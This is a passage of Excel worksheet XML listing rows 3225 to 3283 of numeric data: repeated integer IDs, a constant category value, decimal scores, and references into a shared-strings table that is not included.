    <row r="3225" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3225" s="1">
        <v>3223</v>
      </c>
      <c r="B3225">
        <v>4775</v>
      </c>
      <c r="C3225">
        <v>4775</v>
      </c>
      <c r="D3225">
        <v>2</v>
      </c>
      <c r="E3225">
        <v>0.99839997291564941</v>
      </c>
      <c r="F3225" t="s">
        <v>5592</v>
      </c>
      <c r="G3225" t="s">
        <v>6377</v>
      </c>
      <c r="H3225" t="s">
        <v>6378</v>
      </c>
    </row>
    <row r="3226" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3226" s="1">
        <v>3224</v>
      </c>
      <c r="B3226">
        <v>5855</v>
      </c>
      <c r="C3226">
        <v>5855</v>
      </c>
      <c r="D3226">
        <v>2</v>
      </c>
      <c r="E3226">
        <v>0.99589997529983521</v>
      </c>
      <c r="F3226" t="s">
        <v>5592</v>
      </c>
      <c r="G3226" t="s">
        <v>6379</v>
      </c>
      <c r="H3226" t="s">
        <v>6380</v>
      </c>
    </row>
    <row r="3227" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3227" s="1">
        <v>3225</v>
      </c>
      <c r="B3227">
        <v>4804</v>
      </c>
      <c r="C3227">
        <v>4804</v>
      </c>
      <c r="D3227">
        <v>2</v>
      </c>
      <c r="E3227">
        <v>0.99620002508163452</v>
      </c>
      <c r="F3227" t="s">
        <v>5592</v>
      </c>
      <c r="G3227" t="s">
        <v>6381</v>
      </c>
      <c r="H3227" t="s">
        <v>6382</v>
      </c>
    </row>
    <row r="3228" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3228" s="1">
        <v>3226</v>
      </c>
      <c r="B3228">
        <v>5856</v>
      </c>
      <c r="C3228">
        <v>5856</v>
      </c>
      <c r="D3228">
        <v>2</v>
      </c>
      <c r="E3228">
        <v>0.86419999599456787</v>
      </c>
      <c r="F3228" t="s">
        <v>5592</v>
      </c>
      <c r="G3228" t="s">
        <v>6383</v>
      </c>
      <c r="H3228" t="s">
        <v>6384</v>
      </c>
    </row>
    <row r="3229" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3229" s="1">
        <v>3227</v>
      </c>
      <c r="B3229">
        <v>5881</v>
      </c>
      <c r="C3229">
        <v>5881</v>
      </c>
      <c r="D3229">
        <v>2</v>
      </c>
      <c r="E3229">
        <v>0.85979998111724854</v>
      </c>
      <c r="F3229" t="s">
        <v>5592</v>
      </c>
      <c r="G3229" t="s">
        <v>6385</v>
      </c>
      <c r="H3229" t="s">
        <v>6386</v>
      </c>
    </row>
    <row r="3230" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3230" s="1">
        <v>3228</v>
      </c>
      <c r="B3230">
        <v>5862</v>
      </c>
      <c r="C3230">
        <v>5862</v>
      </c>
      <c r="D3230">
        <v>2</v>
      </c>
      <c r="E3230">
        <v>0.98519998788833618</v>
      </c>
      <c r="F3230" t="s">
        <v>5592</v>
      </c>
      <c r="G3230" t="s">
        <v>6387</v>
      </c>
      <c r="H3230" t="s">
        <v>6388</v>
      </c>
    </row>
    <row r="3231" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3231" s="1">
        <v>3229</v>
      </c>
      <c r="B3231">
        <v>4844</v>
      </c>
      <c r="C3231">
        <v>4844</v>
      </c>
      <c r="D3231">
        <v>2</v>
      </c>
      <c r="E3231">
        <v>0.56690001487731934</v>
      </c>
      <c r="F3231" t="s">
        <v>5592</v>
      </c>
      <c r="G3231" t="s">
        <v>6389</v>
      </c>
      <c r="H3231" t="s">
        <v>6390</v>
      </c>
    </row>
    <row r="3232" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3232" s="1">
        <v>3230</v>
      </c>
      <c r="B3232">
        <v>5874</v>
      </c>
      <c r="C3232">
        <v>5874</v>
      </c>
      <c r="D3232">
        <v>2</v>
      </c>
      <c r="E3232">
        <v>0.47990000247955322</v>
      </c>
      <c r="F3232" t="s">
        <v>5592</v>
      </c>
      <c r="G3232" t="s">
        <v>6391</v>
      </c>
      <c r="H3232" t="s">
        <v>6392</v>
      </c>
    </row>
    <row r="3233" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3233" s="1">
        <v>3231</v>
      </c>
      <c r="B3233">
        <v>4848</v>
      </c>
      <c r="C3233">
        <v>4848</v>
      </c>
      <c r="D3233">
        <v>2</v>
      </c>
      <c r="E3233">
        <v>0.99250000715255737</v>
      </c>
      <c r="F3233" t="s">
        <v>5592</v>
      </c>
      <c r="G3233" t="s">
        <v>6393</v>
      </c>
      <c r="H3233" t="s">
        <v>6394</v>
      </c>
    </row>
    <row r="3234" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3234" s="1">
        <v>3232</v>
      </c>
      <c r="B3234">
        <v>4850</v>
      </c>
      <c r="C3234">
        <v>4850</v>
      </c>
      <c r="D3234">
        <v>2</v>
      </c>
      <c r="E3234">
        <v>0.98869997262954712</v>
      </c>
      <c r="F3234" t="s">
        <v>5592</v>
      </c>
      <c r="G3234" t="s">
        <v>6395</v>
      </c>
      <c r="H3234" t="s">
        <v>6396</v>
      </c>
    </row>
    <row r="3235" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3235" s="1">
        <v>3233</v>
      </c>
      <c r="B3235">
        <v>5863</v>
      </c>
      <c r="C3235">
        <v>5863</v>
      </c>
      <c r="D3235">
        <v>2</v>
      </c>
      <c r="E3235">
        <v>0.75590002536773682</v>
      </c>
      <c r="F3235" t="s">
        <v>5592</v>
      </c>
      <c r="G3235" t="s">
        <v>6397</v>
      </c>
      <c r="H3235" t="s">
        <v>6398</v>
      </c>
    </row>
    <row r="3236" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3236" s="1">
        <v>3234</v>
      </c>
      <c r="B3236">
        <v>4837</v>
      </c>
      <c r="C3236">
        <v>4837</v>
      </c>
      <c r="D3236">
        <v>2</v>
      </c>
      <c r="E3236">
        <v>0.95630002021789551</v>
      </c>
      <c r="F3236" t="s">
        <v>5592</v>
      </c>
      <c r="G3236" t="s">
        <v>6399</v>
      </c>
      <c r="H3236" t="s">
        <v>6400</v>
      </c>
    </row>
    <row r="3237" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3237" s="1">
        <v>3235</v>
      </c>
      <c r="B3237">
        <v>4869</v>
      </c>
      <c r="C3237">
        <v>4869</v>
      </c>
      <c r="D3237">
        <v>2</v>
      </c>
      <c r="E3237">
        <v>0.60680001974105835</v>
      </c>
      <c r="F3237" t="s">
        <v>5592</v>
      </c>
      <c r="G3237" t="s">
        <v>6401</v>
      </c>
      <c r="H3237" t="s">
        <v>6402</v>
      </c>
    </row>
    <row r="3238" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3238" s="1">
        <v>3236</v>
      </c>
      <c r="B3238">
        <v>4868</v>
      </c>
      <c r="C3238">
        <v>4868</v>
      </c>
      <c r="D3238">
        <v>2</v>
      </c>
      <c r="E3238">
        <v>0.71130001544952393</v>
      </c>
      <c r="F3238" t="s">
        <v>5592</v>
      </c>
      <c r="G3238" t="s">
        <v>6403</v>
      </c>
      <c r="H3238" t="s">
        <v>6404</v>
      </c>
    </row>
    <row r="3239" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3239" s="1">
        <v>3237</v>
      </c>
      <c r="B3239">
        <v>4866</v>
      </c>
      <c r="C3239">
        <v>4866</v>
      </c>
      <c r="D3239">
        <v>2</v>
      </c>
      <c r="E3239">
        <v>0.77950000762939453</v>
      </c>
      <c r="F3239" t="s">
        <v>5592</v>
      </c>
      <c r="G3239" t="s">
        <v>6405</v>
      </c>
      <c r="H3239" t="s">
        <v>6406</v>
      </c>
    </row>
    <row r="3240" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3240" s="1">
        <v>3238</v>
      </c>
      <c r="B3240">
        <v>4854</v>
      </c>
      <c r="C3240">
        <v>4854</v>
      </c>
      <c r="D3240">
        <v>2</v>
      </c>
      <c r="E3240">
        <v>0.69440001249313354</v>
      </c>
      <c r="F3240" t="s">
        <v>5592</v>
      </c>
      <c r="G3240" t="s">
        <v>6407</v>
      </c>
      <c r="H3240" t="s">
        <v>6408</v>
      </c>
    </row>
    <row r="3241" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3241" s="1">
        <v>3239</v>
      </c>
      <c r="B3241">
        <v>4864</v>
      </c>
      <c r="C3241">
        <v>4864</v>
      </c>
      <c r="D3241">
        <v>2</v>
      </c>
      <c r="E3241">
        <v>0.71689999103546143</v>
      </c>
      <c r="F3241" t="s">
        <v>5592</v>
      </c>
      <c r="G3241" t="s">
        <v>6409</v>
      </c>
      <c r="H3241" t="s">
        <v>6410</v>
      </c>
    </row>
    <row r="3242" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3242" s="1">
        <v>3240</v>
      </c>
      <c r="B3242">
        <v>5866</v>
      </c>
      <c r="C3242">
        <v>5866</v>
      </c>
      <c r="D3242">
        <v>2</v>
      </c>
      <c r="E3242">
        <v>0.8375999927520752</v>
      </c>
      <c r="F3242" t="s">
        <v>5592</v>
      </c>
      <c r="G3242" t="s">
        <v>6411</v>
      </c>
      <c r="H3242" t="s">
        <v>6412</v>
      </c>
    </row>
    <row r="3243" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3243" s="1">
        <v>3241</v>
      </c>
      <c r="B3243">
        <v>5867</v>
      </c>
      <c r="C3243">
        <v>5867</v>
      </c>
      <c r="D3243">
        <v>2</v>
      </c>
      <c r="E3243">
        <v>0.99519997835159302</v>
      </c>
      <c r="F3243" t="s">
        <v>5592</v>
      </c>
      <c r="G3243" t="s">
        <v>6413</v>
      </c>
      <c r="H3243" t="s">
        <v>6414</v>
      </c>
    </row>
    <row r="3244" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3244" s="1">
        <v>3242</v>
      </c>
      <c r="B3244">
        <v>4860</v>
      </c>
      <c r="C3244">
        <v>4860</v>
      </c>
      <c r="D3244">
        <v>2</v>
      </c>
      <c r="E3244">
        <v>0.85909998416900635</v>
      </c>
      <c r="F3244" t="s">
        <v>5592</v>
      </c>
      <c r="G3244" t="s">
        <v>6415</v>
      </c>
      <c r="H3244" t="s">
        <v>6416</v>
      </c>
    </row>
    <row r="3245" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3245" s="1">
        <v>3243</v>
      </c>
      <c r="B3245">
        <v>4853</v>
      </c>
      <c r="C3245">
        <v>4853</v>
      </c>
      <c r="D3245">
        <v>2</v>
      </c>
      <c r="E3245">
        <v>0.52579998970031738</v>
      </c>
      <c r="F3245" t="s">
        <v>5592</v>
      </c>
      <c r="G3245" t="s">
        <v>6417</v>
      </c>
      <c r="H3245" t="s">
        <v>6418</v>
      </c>
    </row>
    <row r="3246" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3246" s="1">
        <v>3244</v>
      </c>
      <c r="B3246">
        <v>4766</v>
      </c>
      <c r="C3246">
        <v>4766</v>
      </c>
      <c r="D3246">
        <v>2</v>
      </c>
      <c r="E3246">
        <v>0.71539998054504395</v>
      </c>
      <c r="F3246" t="s">
        <v>5592</v>
      </c>
      <c r="G3246" t="s">
        <v>6419</v>
      </c>
      <c r="H3246" t="s">
        <v>6420</v>
      </c>
    </row>
    <row r="3247" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3247" s="1">
        <v>3245</v>
      </c>
      <c r="B3247">
        <v>4836</v>
      </c>
      <c r="C3247">
        <v>4836</v>
      </c>
      <c r="D3247">
        <v>2</v>
      </c>
      <c r="E3247">
        <v>0.99819999933242798</v>
      </c>
      <c r="F3247" t="s">
        <v>5592</v>
      </c>
      <c r="G3247" t="s">
        <v>6421</v>
      </c>
      <c r="H3247" t="s">
        <v>6422</v>
      </c>
    </row>
    <row r="3248" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3248" s="1">
        <v>3246</v>
      </c>
      <c r="B3248">
        <v>4834</v>
      </c>
      <c r="C3248">
        <v>4834</v>
      </c>
      <c r="D3248">
        <v>2</v>
      </c>
      <c r="E3248">
        <v>0.59530001878738403</v>
      </c>
      <c r="F3248" t="s">
        <v>5592</v>
      </c>
      <c r="G3248" t="s">
        <v>6423</v>
      </c>
      <c r="H3248" t="s">
        <v>6424</v>
      </c>
    </row>
    <row r="3249" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3249" s="1">
        <v>3247</v>
      </c>
      <c r="B3249">
        <v>4806</v>
      </c>
      <c r="C3249">
        <v>4806</v>
      </c>
      <c r="D3249">
        <v>2</v>
      </c>
      <c r="E3249">
        <v>0.49200001358985901</v>
      </c>
      <c r="F3249" t="s">
        <v>5592</v>
      </c>
      <c r="G3249" t="s">
        <v>6425</v>
      </c>
      <c r="H3249" t="s">
        <v>6426</v>
      </c>
    </row>
    <row r="3250" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3250" s="1">
        <v>3248</v>
      </c>
      <c r="B3250">
        <v>4808</v>
      </c>
      <c r="C3250">
        <v>4808</v>
      </c>
      <c r="D3250">
        <v>2</v>
      </c>
      <c r="E3250">
        <v>0.82200002670288086</v>
      </c>
      <c r="F3250" t="s">
        <v>5592</v>
      </c>
      <c r="G3250" t="s">
        <v>6427</v>
      </c>
      <c r="H3250" t="s">
        <v>6428</v>
      </c>
    </row>
    <row r="3251" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3251" s="1">
        <v>3249</v>
      </c>
      <c r="B3251">
        <v>5858</v>
      </c>
      <c r="C3251">
        <v>5858</v>
      </c>
      <c r="D3251">
        <v>2</v>
      </c>
      <c r="E3251">
        <v>0.87360000610351563</v>
      </c>
      <c r="F3251" t="s">
        <v>5592</v>
      </c>
      <c r="G3251" t="s">
        <v>6429</v>
      </c>
      <c r="H3251" t="s">
        <v>6023</v>
      </c>
    </row>
    <row r="3252" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3252" s="1">
        <v>3250</v>
      </c>
      <c r="B3252">
        <v>4812</v>
      </c>
      <c r="C3252">
        <v>4812</v>
      </c>
      <c r="D3252">
        <v>2</v>
      </c>
      <c r="E3252">
        <v>0.95599997043609619</v>
      </c>
      <c r="F3252" t="s">
        <v>5592</v>
      </c>
      <c r="G3252" t="s">
        <v>6430</v>
      </c>
      <c r="H3252" t="s">
        <v>6431</v>
      </c>
    </row>
    <row r="3253" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3253" s="1">
        <v>3251</v>
      </c>
      <c r="B3253">
        <v>4813</v>
      </c>
      <c r="C3253">
        <v>4813</v>
      </c>
      <c r="D3253">
        <v>2</v>
      </c>
      <c r="E3253">
        <v>0.92489999532699585</v>
      </c>
      <c r="F3253" t="s">
        <v>5592</v>
      </c>
      <c r="G3253" t="s">
        <v>6432</v>
      </c>
      <c r="H3253" t="s">
        <v>6433</v>
      </c>
    </row>
    <row r="3254" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3254" s="1">
        <v>3252</v>
      </c>
      <c r="B3254">
        <v>4881</v>
      </c>
      <c r="C3254">
        <v>4881</v>
      </c>
      <c r="D3254">
        <v>2</v>
      </c>
      <c r="E3254">
        <v>0.99540001153945923</v>
      </c>
      <c r="F3254" t="s">
        <v>5592</v>
      </c>
      <c r="G3254" t="s">
        <v>6434</v>
      </c>
      <c r="H3254" t="s">
        <v>6435</v>
      </c>
    </row>
    <row r="3255" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3255" s="1">
        <v>3253</v>
      </c>
      <c r="B3255">
        <v>5896</v>
      </c>
      <c r="C3255">
        <v>5896</v>
      </c>
      <c r="D3255">
        <v>2</v>
      </c>
      <c r="E3255">
        <v>0.79009997844696045</v>
      </c>
      <c r="F3255" t="s">
        <v>5592</v>
      </c>
      <c r="G3255" t="s">
        <v>6436</v>
      </c>
      <c r="H3255" t="s">
        <v>6437</v>
      </c>
    </row>
    <row r="3256" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3256" s="1">
        <v>3254</v>
      </c>
      <c r="B3256">
        <v>4874</v>
      </c>
      <c r="C3256">
        <v>4874</v>
      </c>
      <c r="D3256">
        <v>2</v>
      </c>
      <c r="E3256">
        <v>0.99839997291564941</v>
      </c>
      <c r="F3256" t="s">
        <v>5592</v>
      </c>
      <c r="G3256" t="s">
        <v>6438</v>
      </c>
      <c r="H3256" t="s">
        <v>6439</v>
      </c>
    </row>
    <row r="3257" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3257" s="1">
        <v>3255</v>
      </c>
      <c r="B3257">
        <v>4880</v>
      </c>
      <c r="C3257">
        <v>4880</v>
      </c>
      <c r="D3257">
        <v>2</v>
      </c>
      <c r="E3257">
        <v>0.99809998273849487</v>
      </c>
      <c r="F3257" t="s">
        <v>5592</v>
      </c>
      <c r="G3257" t="s">
        <v>6440</v>
      </c>
      <c r="H3257" t="s">
        <v>6441</v>
      </c>
    </row>
    <row r="3258" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3258" s="1">
        <v>3256</v>
      </c>
      <c r="B3258">
        <v>5894</v>
      </c>
      <c r="C3258">
        <v>5894</v>
      </c>
      <c r="D3258">
        <v>2</v>
      </c>
      <c r="E3258">
        <v>0.6689000129699707</v>
      </c>
      <c r="F3258" t="s">
        <v>5592</v>
      </c>
      <c r="G3258" t="s">
        <v>6442</v>
      </c>
      <c r="H3258" t="s">
        <v>6443</v>
      </c>
    </row>
    <row r="3259" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3259" s="1">
        <v>3257</v>
      </c>
      <c r="B3259">
        <v>5893</v>
      </c>
      <c r="C3259">
        <v>5893</v>
      </c>
      <c r="D3259">
        <v>2</v>
      </c>
      <c r="E3259">
        <v>0.99889999628067017</v>
      </c>
      <c r="F3259" t="s">
        <v>5592</v>
      </c>
      <c r="G3259" t="s">
        <v>6444</v>
      </c>
      <c r="H3259" t="s">
        <v>6445</v>
      </c>
    </row>
    <row r="3260" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3260" s="1">
        <v>3258</v>
      </c>
      <c r="B3260">
        <v>4879</v>
      </c>
      <c r="C3260">
        <v>4879</v>
      </c>
      <c r="D3260">
        <v>2</v>
      </c>
      <c r="E3260">
        <v>0.99919998645782471</v>
      </c>
      <c r="F3260" t="s">
        <v>5592</v>
      </c>
      <c r="G3260" t="s">
        <v>6446</v>
      </c>
      <c r="H3260" t="s">
        <v>6447</v>
      </c>
    </row>
    <row r="3261" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3261" s="1">
        <v>3259</v>
      </c>
      <c r="B3261">
        <v>5889</v>
      </c>
      <c r="C3261">
        <v>5889</v>
      </c>
      <c r="D3261">
        <v>2</v>
      </c>
      <c r="E3261">
        <v>0.99730002880096436</v>
      </c>
      <c r="F3261" t="s">
        <v>5592</v>
      </c>
      <c r="G3261" t="s">
        <v>6448</v>
      </c>
      <c r="H3261" t="s">
        <v>6449</v>
      </c>
    </row>
    <row r="3262" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3262" s="1">
        <v>3260</v>
      </c>
      <c r="B3262">
        <v>5888</v>
      </c>
      <c r="C3262">
        <v>5888</v>
      </c>
      <c r="D3262">
        <v>2</v>
      </c>
      <c r="E3262">
        <v>0.75730001926422119</v>
      </c>
      <c r="F3262" t="s">
        <v>5592</v>
      </c>
      <c r="G3262" t="s">
        <v>6450</v>
      </c>
      <c r="H3262" t="s">
        <v>6451</v>
      </c>
    </row>
    <row r="3263" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3263" s="1">
        <v>3261</v>
      </c>
      <c r="B3263">
        <v>5883</v>
      </c>
      <c r="C3263">
        <v>5883</v>
      </c>
      <c r="D3263">
        <v>2</v>
      </c>
      <c r="E3263">
        <v>0.8442000150680542</v>
      </c>
      <c r="F3263" t="s">
        <v>5592</v>
      </c>
      <c r="G3263" t="s">
        <v>6452</v>
      </c>
      <c r="H3263" t="s">
        <v>6453</v>
      </c>
    </row>
    <row r="3264" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3264" s="1">
        <v>3262</v>
      </c>
      <c r="B3264">
        <v>4832</v>
      </c>
      <c r="C3264">
        <v>4832</v>
      </c>
      <c r="D3264">
        <v>2</v>
      </c>
      <c r="E3264">
        <v>0.57529997825622559</v>
      </c>
      <c r="F3264" t="s">
        <v>5592</v>
      </c>
      <c r="G3264" t="s">
        <v>6454</v>
      </c>
      <c r="H3264" t="s">
        <v>6455</v>
      </c>
    </row>
    <row r="3265" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3265" s="1">
        <v>3263</v>
      </c>
      <c r="B3265">
        <v>5895</v>
      </c>
      <c r="C3265">
        <v>5895</v>
      </c>
      <c r="D3265">
        <v>2</v>
      </c>
      <c r="E3265">
        <v>0.69770002365112305</v>
      </c>
      <c r="F3265" t="s">
        <v>5592</v>
      </c>
      <c r="G3265" t="s">
        <v>6456</v>
      </c>
      <c r="H3265" t="s">
        <v>6457</v>
      </c>
    </row>
    <row r="3266" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3266" s="1">
        <v>3264</v>
      </c>
      <c r="B3266">
        <v>6034</v>
      </c>
      <c r="C3266">
        <v>6034</v>
      </c>
      <c r="D3266">
        <v>2</v>
      </c>
      <c r="E3266">
        <v>0.63190001249313354</v>
      </c>
      <c r="F3266" t="s">
        <v>5592</v>
      </c>
      <c r="G3266" t="s">
        <v>6458</v>
      </c>
      <c r="H3266" t="s">
        <v>6459</v>
      </c>
    </row>
    <row r="3267" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3267" s="1">
        <v>3265</v>
      </c>
      <c r="B3267">
        <v>4921</v>
      </c>
      <c r="C3267">
        <v>4921</v>
      </c>
      <c r="D3267">
        <v>2</v>
      </c>
      <c r="E3267">
        <v>0.44650000333786011</v>
      </c>
      <c r="F3267" t="s">
        <v>5592</v>
      </c>
      <c r="G3267" t="s">
        <v>6460</v>
      </c>
      <c r="H3267" t="s">
        <v>6461</v>
      </c>
    </row>
    <row r="3268" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3268" s="1">
        <v>3266</v>
      </c>
      <c r="B3268">
        <v>4923</v>
      </c>
      <c r="C3268">
        <v>4923</v>
      </c>
      <c r="D3268">
        <v>2</v>
      </c>
      <c r="E3268">
        <v>0.80980002880096436</v>
      </c>
      <c r="F3268" t="s">
        <v>5592</v>
      </c>
      <c r="G3268" t="s">
        <v>6462</v>
      </c>
      <c r="H3268" t="s">
        <v>6463</v>
      </c>
    </row>
    <row r="3269" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3269" s="1">
        <v>3267</v>
      </c>
      <c r="B3269">
        <v>4673</v>
      </c>
      <c r="C3269">
        <v>4673</v>
      </c>
      <c r="D3269">
        <v>2</v>
      </c>
      <c r="E3269">
        <v>0.57999998331069946</v>
      </c>
      <c r="F3269" t="s">
        <v>5592</v>
      </c>
      <c r="G3269" t="s">
        <v>6464</v>
      </c>
      <c r="H3269" t="s">
        <v>6465</v>
      </c>
    </row>
    <row r="3270" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3270" s="1">
        <v>3268</v>
      </c>
      <c r="B3270">
        <v>5926</v>
      </c>
      <c r="C3270">
        <v>5926</v>
      </c>
      <c r="D3270">
        <v>2</v>
      </c>
      <c r="E3270">
        <v>0.99320000410079956</v>
      </c>
      <c r="F3270" t="s">
        <v>5592</v>
      </c>
      <c r="G3270" t="s">
        <v>6466</v>
      </c>
      <c r="H3270" t="s">
        <v>6467</v>
      </c>
    </row>
    <row r="3271" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3271" s="1">
        <v>3269</v>
      </c>
      <c r="B3271">
        <v>4978</v>
      </c>
      <c r="C3271">
        <v>4978</v>
      </c>
      <c r="D3271">
        <v>2</v>
      </c>
      <c r="E3271">
        <v>0.99559998512268066</v>
      </c>
      <c r="F3271" t="s">
        <v>5592</v>
      </c>
      <c r="G3271" t="s">
        <v>6468</v>
      </c>
      <c r="H3271" t="s">
        <v>6469</v>
      </c>
    </row>
    <row r="3272" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3272" s="1">
        <v>3270</v>
      </c>
      <c r="B3272">
        <v>4675</v>
      </c>
      <c r="C3272">
        <v>4675</v>
      </c>
      <c r="D3272">
        <v>2</v>
      </c>
      <c r="E3272">
        <v>0.71340000629425049</v>
      </c>
      <c r="F3272" t="s">
        <v>5592</v>
      </c>
      <c r="G3272" t="s">
        <v>6470</v>
      </c>
      <c r="H3272" t="s">
        <v>6471</v>
      </c>
    </row>
    <row r="3273" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3273" s="1">
        <v>3271</v>
      </c>
      <c r="B3273">
        <v>4680</v>
      </c>
      <c r="C3273">
        <v>4680</v>
      </c>
      <c r="D3273">
        <v>2</v>
      </c>
      <c r="E3273">
        <v>0.61169999837875366</v>
      </c>
      <c r="F3273" t="s">
        <v>5592</v>
      </c>
      <c r="G3273" t="s">
        <v>6472</v>
      </c>
      <c r="H3273" t="s">
        <v>6473</v>
      </c>
    </row>
    <row r="3274" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3274" s="1">
        <v>3272</v>
      </c>
      <c r="B3274">
        <v>4681</v>
      </c>
      <c r="C3274">
        <v>4681</v>
      </c>
      <c r="D3274">
        <v>2</v>
      </c>
      <c r="E3274">
        <v>0.99610000848770142</v>
      </c>
      <c r="F3274" t="s">
        <v>5592</v>
      </c>
      <c r="G3274" t="s">
        <v>6474</v>
      </c>
      <c r="H3274" t="s">
        <v>6475</v>
      </c>
    </row>
    <row r="3275" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3275" s="1">
        <v>3273</v>
      </c>
      <c r="B3275">
        <v>4682</v>
      </c>
      <c r="C3275">
        <v>4682</v>
      </c>
      <c r="D3275">
        <v>2</v>
      </c>
      <c r="E3275">
        <v>0.99830001592636108</v>
      </c>
      <c r="F3275" t="s">
        <v>5592</v>
      </c>
      <c r="G3275" t="s">
        <v>6476</v>
      </c>
      <c r="H3275" t="s">
        <v>6477</v>
      </c>
    </row>
    <row r="3276" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3276" s="1">
        <v>3274</v>
      </c>
      <c r="B3276">
        <v>4683</v>
      </c>
      <c r="C3276">
        <v>4683</v>
      </c>
      <c r="D3276">
        <v>2</v>
      </c>
      <c r="E3276">
        <v>0.91610002517700195</v>
      </c>
      <c r="F3276" t="s">
        <v>5592</v>
      </c>
      <c r="G3276" t="s">
        <v>6478</v>
      </c>
      <c r="H3276" t="s">
        <v>6479</v>
      </c>
    </row>
    <row r="3277" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3277" s="1">
        <v>3275</v>
      </c>
      <c r="B3277">
        <v>4684</v>
      </c>
      <c r="C3277">
        <v>4684</v>
      </c>
      <c r="D3277">
        <v>2</v>
      </c>
      <c r="E3277">
        <v>0.87999999523162842</v>
      </c>
      <c r="F3277" t="s">
        <v>5592</v>
      </c>
      <c r="G3277" t="s">
        <v>6480</v>
      </c>
      <c r="H3277" t="s">
        <v>6481</v>
      </c>
    </row>
    <row r="3278" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3278" s="1">
        <v>3276</v>
      </c>
      <c r="B3278">
        <v>4687</v>
      </c>
      <c r="C3278">
        <v>4687</v>
      </c>
      <c r="D3278">
        <v>2</v>
      </c>
      <c r="E3278">
        <v>0.96090000867843628</v>
      </c>
      <c r="F3278" t="s">
        <v>5592</v>
      </c>
      <c r="G3278" t="s">
        <v>6482</v>
      </c>
      <c r="H3278" t="s">
        <v>6483</v>
      </c>
    </row>
    <row r="3279" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3279" s="1">
        <v>3277</v>
      </c>
      <c r="B3279">
        <v>4688</v>
      </c>
      <c r="C3279">
        <v>4688</v>
      </c>
      <c r="D3279">
        <v>2</v>
      </c>
      <c r="E3279">
        <v>0.99779999256134033</v>
      </c>
      <c r="F3279" t="s">
        <v>5592</v>
      </c>
      <c r="G3279" t="s">
        <v>6484</v>
      </c>
      <c r="H3279" t="s">
        <v>6485</v>
      </c>
    </row>
    <row r="3280" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3280" s="1">
        <v>3278</v>
      </c>
      <c r="B3280">
        <v>5816</v>
      </c>
      <c r="C3280">
        <v>5816</v>
      </c>
      <c r="D3280">
        <v>2</v>
      </c>
      <c r="E3280">
        <v>0.52799999713897705</v>
      </c>
      <c r="F3280" t="s">
        <v>5592</v>
      </c>
      <c r="G3280" t="s">
        <v>6486</v>
      </c>
      <c r="H3280" t="s">
        <v>6487</v>
      </c>
    </row>
    <row r="3281" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3281" s="1">
        <v>3279</v>
      </c>
      <c r="B3281">
        <v>5924</v>
      </c>
      <c r="C3281">
        <v>5924</v>
      </c>
      <c r="D3281">
        <v>2</v>
      </c>
      <c r="E3281">
        <v>0.49880000948905939</v>
      </c>
      <c r="F3281" t="s">
        <v>5592</v>
      </c>
      <c r="G3281" t="s">
        <v>6488</v>
      </c>
      <c r="H3281" t="s">
        <v>6489</v>
      </c>
    </row>
    <row r="3282" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3282" s="1">
        <v>3280</v>
      </c>
      <c r="B3282">
        <v>4693</v>
      </c>
      <c r="C3282">
        <v>4693</v>
      </c>
      <c r="D3282">
        <v>2</v>
      </c>
      <c r="E3282">
        <v>0.57260000705718994</v>
      </c>
      <c r="F3282" t="s">
        <v>5592</v>
      </c>
      <c r="G3282" t="s">
        <v>6490</v>
      </c>
      <c r="H3282" t="s">
        <v>6491</v>
      </c>
    </row>
    <row r="3283" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3283" s="1">
        <v>3281</v>
      </c>
      <c r="B3283">
        <v>5921</v>
      </c>
